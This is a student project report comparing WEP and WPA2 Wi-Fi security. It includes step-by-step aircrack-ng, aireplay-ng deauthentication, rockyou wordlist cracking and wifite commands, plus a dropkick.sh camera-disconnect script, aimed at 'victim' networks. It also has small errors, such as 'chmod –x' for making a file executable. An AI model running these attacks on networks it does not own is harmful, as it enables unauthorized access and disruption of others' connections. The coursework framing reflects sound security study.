WEP vs WPA2 e - cysecure.orgcysecure.org/560/online/project/wpa2Encrypt_rajRamadhim_bashMoha… ·...
Transcript of WEP vs WPA2 e - cysecure.orgcysecure.org/560/online/project/wpa2Encrypt_rajRamadhim_bashMoha… ·...
-
WEP VS WPA2
Encryptions
Mercy College
Alexander Martin, Basiru Mohammed, Rajkumar Ramadhin
IASP 560
December 13, 2019
-
1
Contents
1.0 Introduction.............................................................................................................................................. 2
2.0 Problem Description ................................................................................................................................ 2
3.0 WEP Encryption ...................................................................................................................................... 3
3.1 WEP Vulnerabilities ............................................................................................................................ 3
4.0 WPA2 Encryption .................................................................................................................................... 4
4.1 WPA2 Vulnerabilities .......................................................................................................................... 5
5.0 Our Approach .......................................................................................................................................... 5
5.1 Cracking WPA/WPA2 Wi-Fi Router with Aircrack-ng ...................................................................... 6
5.1.1 Setting up the field ........................................................................................................................ 6
5.1.2 Preparing the field ......................................................................................................................... 6
5.1.3 Finding the Target ......................................................................................................................... 7
5.1.4 Capture the 4-way Handshake ............................................................................................... 8
5.1.5 Cracking With Aircrack-ng .......................................................................................................... 9
5.2 Password Cracking: WEP .................................................................................................................. 10
5.3 Using Bash Script to perform a de-authentication attack .................................................................. 12
6.0 Conclusion ............................................................................................................................................. 13
7.0 References .............................................................................................................................................. 13
-
2
1.0 Introduction
As technology advances, so does security. Security algorithms to protect wireless
networks were created to protect people from malicious users. Unfortunately, this does not
always work; shortly after WEP was created, multiple security flaws were discovered. It was
later followed by numerous forms of WEP before the industry moved to the now-standard
WPA2. While it is more secure, it still has vulnerabilities of its own. This report aims to look at
the weaknesses and exploit them in real-world scenarios. The significance of this research
becomes obvious as ordinary people fall victims to seemingly “safe” encryptions and leave
themselves open to several attacks. This paper will enable and individual using a router with
either encryptions know how to protect his or her netwok. Also, in 2015 it was reported that
some AirBnB owners were found to have installed secret surveillance cameras in their rented
apartments/houses. As a result of this, a programmer created a bash script that would perform a
de-authentication attack using minimal tools or programs. This will help the ordinary tourist
know how to kick any of these devices offline (if any) and sleep soundly in his or her tempory
home knowing that nobody is spying on him or her.
2.0 Problem Description
There has been several encryption methods in succession, whenever one is developed and it
becomes vulnerable due to advancement in technology, another is developed to replace or
supliment it. It first started with WEP to the wired equivalent of WLAN technology.
Unfortunately, it failed for a number for reason and was eventually surpassed by WPA2. This
paper aims at comparing the encryption method and ease in realistically cracking their individual
passwords. We also evaluated the difference WEP will make on IoT devices compared to WPA2.
-
3
Further recommendations of will be made on which to use and how best to protect a network
using either.
3.0 WEP Encryption
Wired Equivalent Privacy (WEP) was first introduced in 1997 as part of the original
802.11 standards. The initial goal of WEP was to provide the same type of security as a
traditional wired network. It became the industry standard in 1999. It started with 64-bit
encryption then adapted the 128-bit model. WEP uses the stream cipher Rivest Cipher 4 (RC4)
method of encryption. WEP started with a 64-bit encryption model. This was a 40-bit key with a
24-bit initialization vector. The original WEP key size was limited by the US Government
restriction on cryptographic technology. It was later changed to 128-bit, with a 104-bit key size,
and then it evolved in a 256-bit WEP key. Even though the stronger 256-bit key is available, the
128-bit key is still the standard.
The way the authentication works is by having the endpoint send an authentication
request to the Access Point. The Access point responds with a clear-text challenge. The client
encrypts the text using the configured WEP key and sends it back in another authentication
request. Finally, the Access Point decrypts the response, and if matches the text is sends back a
positive response.
3.1 WEP Vulnerabilities
WEP features a multitude of vulnerabilities. The first one is that it does not prevent
forgery of packets. It does not protect against replay attacks, and the attacker can get into an
Access Point without knowing the encryption key due to the reuse of initialization vectors. Due
to the poor implementation of the RC4 encryption it is prone to brute force attacks within hour
hours.
-
4
To solve these problems, WEP2 and WEP+ were introduced. WEP2 was a solution to
hardware that was not able to handle WPA and WPA2. It attempted to fix the access key issue
and the reuse of initialization vectors but failed and was renamed to WPA-TKIP. WPA-TKIP
took a feature from dynamic WEP, the ability to change keys, while it made it into WPA-TKID
it never appeared in standard WEP. WEP+ was a propriety version by Access Systems. The
security improvements that came with WEP+ was only available when both endpoints were
connected to WEP+.
4.0 WPA2 Encryption
In 2004, the Institute of Electrical and Electronics Engineers (IEEE) created 802.11i, a
supplement to the already existing 802.11 wireless network standard due to the well know the
weakness of WEP and TKIP of WPA [1]. An industry regulation organization which owns the
trademark for Wi-Fi called Wi-Fi Alliance adopted the 802.11i to be used with the WPA2
certification without requiring the replacement of legacy hardware [2].
The main improvement of the WPA2 is the substitution of TKIP with AES-CCMP for
non-enterprise authentication. The Temporal Key Integrity Protocol (TKIP) is not an encryption
algorithm, but it is introduced with the WPA to govern the creation of a new 128-bit for each
packet sent and prevents replay attacks that make any WEP network vulnerable to cracking
software. The WEP uses the Cyclic Redundancy Check while the TKIP came with a Message
Authentication Code, which is much stronger.
However, the nightmares for TKIP started when it became vulnerable to Man-In-The-
Middle attacks in 2008. Martin Beck and Erik Tews discovered a way to exploit 802.11e QoS
features to decrypt short packets in a TKIP protected network.
-
5
The AES comes with CCMP (Counter Mode Cipher Block Chaining Message
Authentication Code Protocol). The AES-CCMP is not susceptible to the same replay attacks
that brought the TKIP to its knees in 2009. However, even though WPA2 certification supported
AES-CCMP, it is backward compatible with the TKIP, hence many users still could use the
TKIP in order for other devices, which are WPA2 incompatible with connecting to the network.
4.1 WPA2 Vulnerabilities
Just when we thought there was a solution for wireless security through AES-CCMP, the
famous KRACK attack brought its failure in early 2017. The 802.11i allowed the occasional
dropped network connection and in order to speed up re-connection allowing the re-used of an
old key by devices that have lost connection. This makes it possible for an attacker to reconstruct
the entire keychain by capturing packets and use a replay attack to force the network to
repeatedly send the same known blocks with new random number to access the network.
Sometimes, when both WPA and WPA2 are enabled on a router, they can cause connection
failures on the client side.
5.0 Our Approach
For the implementation side of our project, after an extensive research on the
implementation and vulnerabilities of the individual encryption methods under consideration, we
will go ahead and set up procedures to test the difficulties in cracking each of the encryption
processes. A testing environment in the form of Kali Linux is set up try to crack a simple WEP
and WPA2 passwords. Later, as the project evolves, we may attempt to bring a wifi-based
surveillance camera offline.
-
6
5.1 Cracking WPA/WPA2 Wi-Fi Router with Aircrack-ng
When Wi-Fi networks are secured with weak passwords, the passive procedure stated below
illustrates how they are cracked.
5.1.1 Setting up the field
To begin this procedure, a fully operational Kali linux system is required. By the Debian
command sudo apt-get install aircrack-ng to install Aircrack-ng and finally ensuring that the
wireless card supports monitor mode.
5.1.2 Preparing the field
• Before we go into monitor mode, the commands airmon-ng check and airmon-ng check
kill are used to stop or terminate all conflicting programs.
• Use the command airmon-ng to list wireless interfaces that support monitor mode if any
and note the wireless interface to be used say wlan0
• The command airmon-ng start wlan0 is used to place the wlan0 interface into monitor
mode
-
7
• iwconfig is run to confirm the selected interface in monitor mode
5.1.3 Finding the Target
• The command airodump-ng mon0 is used to listen to 802.11 Beacon frames broadcast by
the wireless routers in proximity which have interfaces that support monitor mode.
Choose the network you would want to crack noting its BSSID (MAC address) and the
channel (CH) number displayed to proceed with the next step
-
8
5.1.4 Capture the 4-way Handshake
• WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. This
handshake is captured by directing airmon-ng to monitor traffic on the target network
using the BSSID and the channel values noted from the previous step
• Begin capturing packet information from victim router/network using airodump-ng -
c#channelnumber# -w capture -d #victimbssid# wlan0mon. This will automatically
monitor and search for any packet exchanges.
• Keep this running until the SSID of the station to be used in the next command is
obtained.
• Use aireplay-ng --deauth 0 -a #victimbssid# -c #stationbssid# wlan0mon to begin
deauthentication attack and packet capture in new command window.
• While keeping an eye on airodump-ng window, once a handshake is captured it will
display on the top right and will autosave as a .cap file.
-
9
• Use wireshark nameofcapturefile to view the captured handshake information you can
open it in wireshark. (While in wireshark, filter by "eapol" and all 4 handshakes will be
seen)
5.1.5 Cracking With Aircrack-ng
• To obtain a word list for the attack, the dictionary file “rockyou.txt” is downloaded from
the URL: https://github.com/brannondorsey/naive-
hashcat/releases/download/data/rockyou.txt
• While in the terminal, we go to the directory of the wordlist ~# cd /usr/share/wordlists/
and ls is used to list all the files in the directory. This gives us something like ~# gzip -d
rockyou.txt.gz
• Cracking with the wordlist begins using the command aircrack-ng
#nameofcapturedfile# -w /usr/share/wordlists/rockyou.txt and when the password is
found, it will be seen next to ‘KEY FOUND’ as shown below.
-
10
5.2 Password Cracking: WEP
To crack WEP we plan to utilize a kali Linux tool known as wifite. Wifite is an out of the box
automated WEP, WPA and WPS cracking tool. Wifite’s automation is impressive. This tool is
customizable with only a few arguments (timeouts, packets/second). It scans and sorts the targets
by signal strength and cracking the access points with the strongest strength first. I automatically
does deauthentication attacks of to reveal SSIDs. It has the ‘anonymous’ feature which change the
MAC address and changes it back when the attack is done. The captured WPA handshakes are
backed up to the current directory of wifite.py. It does allow any initiated attack to be stopped
Ctrl+C and providing an option to continue, move to the next target, skip and exit with all of its
cracked passwords saved to cracked.txt. Wifite at play is demonstrated below:
• Use airmon-ng start wlan0 to put interface wlan0 in monitor mode as used above
• iwconfig is used to confirm that wlan0 is in monitor mode
-
11
• Use the comman wifite to begin wifite. It begins to scan for all the wifi connection the
vicinity and press Crtl+c when the wifi you desire to attack is found.
• It then prompts you to select the network(s) you want to attack, since you can attack
multiple network. However, in this case we select 3. This will initiate a number of attacks
on the selected network but will provide you an option to move or skip to the next attack.
• It does the deauthentication attack on the network and captures the handshake and saves it
as a .cap file.
• It then begins the analysis on the .cap file and cracks the password using the built-in
wordlist or dictionary as seen below.
-
12
5.3 Using Bash Script To Perform A De-Authentication Attack
In 2015 it was reported that some AirBnB owners were found to have installed secret
surveillance cameras in their rented apartments/houses. As a result of this, a programmer created
a bash script that would perform a de-authentication attack using minimal tools or programs. The
script would auto-detect two types of popular cameras, and automatically disconnect them from
their respective networks, bringing them offline. We will test this script to see its viability.
The script used in this process is called dropkick.sh, created by /JulianOliver and is
available through GitHub. The script will do everything as the process before but in a single shell
script and have the code repeat every 30 seconds. The benefit of the code running every 30
seconds is that it will continually kick devices off the network, preventing Wi-Fi cameras from
reconnecting and spying. The biggest issue with dropkick.sh is that it will find devices made by
specific manufactures, so it can remove baby monitors and devices on the network. The only
necessary step in running this script is using the command chmod –x dropkick.sh to make the
file an executable.
-
13
6.0 Conclusion
Through the research we learned the difference between the difference encryption
methods of wirless security aand focus on what makes WPA2 more secure than WEP. Through
our research we were able to learn the flaws of WEP and the evolution of wireless
communication. A good and strong Wi-Fi password is a good way to practice cyber hygiene, as
well as being aware of access points you are connecting to. Finally, through our implementation
and testing, it was discovered that the vulnerabilities are not only password related, but can be
taken advantage of, to remove a client off the network. Though, this is not the end of wireless
evolution as Wi-Fi 3 can bring new adaptions and changes to the space. Possibly making the
vulnerabilities found no longer viable.
7.0 References
Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat by Brannon Dorsey. (2019, January 11).
Retrieved from hakin9.org: https://hakin9.org/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-
and-hashcat/
-
14
Kali Tools. (n.d.). Wifite Package Description. Retrieved from Kali Tools: https://tools.kali.org/wireless-
attacks/wifite
Kody. (2018, April 16). Hunting Down & Cracking WEP Networks . Retrieved from null-byte: https://null-
byte.wonderhowto.com/how-to/hack-wi-fi-hunting-down-cracking-wep-networks-0183712/
lacaskauffman. (2013, 08 28). WiFi security: history of insecurities in WEP, WPA and WPA2. Retrieved
from Blog Overflow: https://security.blogoverflow.com/2013/08/wifi-security-history-of-
insecurities-in-wep-wpa-and-wpa2/
Lashkari, A., Mansoori, M., & Danesh, A. (2009). Wired Equivalent Privacy (WEP) versus Wi-Fi Protected
Access (WPA). International Conference on Signal Processing Systems, (pp. 445-449).
Mitchell, B. (2019, July 09). An Overview of Wireless Protected Access 2 (WPA2). Retrieved from lifewire:
https://www.lifewire.com/what-is-wpa2-818352
Oliver, J. (2015, December 18). Detect and disconnect WiFi cameras in that AirBnB you’re staying in.
Retrieved from Julian Oliver: https://julianoliver.com/output/log_2015-12-18_14-39
Skerritt, B. (2019, October 14). Forcing a device to disconnect from WiFi using a deauthentication attack.
Retrieved from hackernoon: https://hackernoon.com/forcing-a-device-to-disconnect-from-wifi-
using-a-deauthentication-attack-f664b9940142
Slater, J. (2019, October 3). A brief history of Wi-Fi security protocols from “oh my, that’s bad” to WPA3.
Retrieved from Ars Technica: https://arstechnica.com/gadgets/2019/03/802-eleventy-who-
goes-there-wpa3-wi-fi-security-and-what-came-before-it/
1.0 Introduction2.0 Problem Description3.0 WEP Encryption3.1 WEP Vulnerabilities
4.0 WPA2 Encryption4.1 WPA2 Vulnerabilities
5.0 Our Approach5.1 Cracking WPA/WPA2 Wi-Fi Router with Aircrack-ng5.1.1 Setting up the field5.1.2 Preparing the field5.1.3 Finding the Target5.1.4 Capture the 4-way Handshake5.1.5 Cracking With Aircrack-ng
5.2 Password Cracking: WEP5.3 Using Bash Script To Perform A De-Authentication Attack
6.0 Conclusion7.0 References